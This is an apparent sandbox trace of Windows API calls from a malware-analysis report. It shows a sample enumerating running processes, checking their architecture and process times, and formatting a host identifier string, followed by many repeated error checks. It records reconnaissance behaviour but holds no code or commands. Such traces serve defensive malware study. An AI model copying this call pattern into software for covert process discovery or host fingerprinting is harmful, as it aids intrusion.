	[0097.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0097.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0097.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0097.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0097.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0097.066] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.066] CloseHandle (hObject=0x248) returned 1
	[0097.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0097.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0097.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x6590a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0097.067] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.067] CloseHandle (hObject=0x248) returned 1
	[0097.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x6590a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0097.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0097.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0097.068] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.068] CloseHandle (hObject=0x248) returned 1
	[0097.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0097.068] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.068] CloseHandle (hObject=0x248) returned 1
	[0097.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0097.069] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.069] CloseHandle (hObject=0x248) returned 1
	[0097.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0097.069] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.069] CloseHandle (hObject=0x248) returned 1
	[0097.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658f68, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0097.069] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.069] CloseHandle (hObject=0x248) returned 1
	[0097.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0097.069] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.070] CloseHandle (hObject=0x248) returned 1
	[0097.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0097.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0097.070] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.070] CloseHandle (hObject=0x248) returned 1
	[0097.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0097.070] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.070] CloseHandle (hObject=0x248) returned 1
	[0097.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0097.071] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.071] CloseHandle (hObject=0x248) returned 1
	[0097.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658dc8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0097.071] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.071] CloseHandle (hObject=0x248) returned 1
	[0097.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x6590c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0097.071] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.071] CloseHandle (hObject=0x248) returned 1
	[0097.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65add8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0097.072] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.072] CloseHandle (hObject=0x248) returned 1
	[0097.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658e68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0097.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0097.072] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.072] CloseHandle (hObject=0x248) returned 1
	[0097.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658970, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0097.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0097.072] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.072] CloseHandle (hObject=0x248) returned 1
	[0097.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658dc8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0097.073] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.073] CloseHandle (hObject=0x248) returned 1
	[0097.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0097.073] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.073] CloseHandle (hObject=0x248) returned 1
	[0097.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0097.073] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.073] CloseHandle (hObject=0x248) returned 1
	[0097.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658d28, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0097.074] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.074] CloseHandle (hObject=0x248) returned 1
	[0097.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658f68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0097.074] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.074] CloseHandle (hObject=0x248) returned 1
	[0097.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0097.074] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.074] CloseHandle (hObject=0x248) returned 1
	[0097.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0097.075] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.075] CloseHandle (hObject=0x248) returned 1
	[0097.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0097.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0097.075] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.075] CloseHandle (hObject=0x248) returned 1
	[0097.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0097.075] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.075] CloseHandle (hObject=0x248) returned 1
	[0097.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0097.076] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.076] CloseHandle (hObject=0x248) returned 1
	[0097.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x6590a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0097.076] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.076] CloseHandle (hObject=0x248) returned 1
	[0097.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0097.076] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.076] CloseHandle (hObject=0x248) returned 1
	[0097.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658ee8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0097.077] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.077] CloseHandle (hObject=0x248) returned 1
	[0097.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0097.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0097.077] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.077] CloseHandle (hObject=0x248) returned 1
	[0097.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658998, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0097.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.077] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.077] CloseHandle (hObject=0x248) returned 1
	[0097.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.078] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.079] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0097.079] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.079] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.080] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
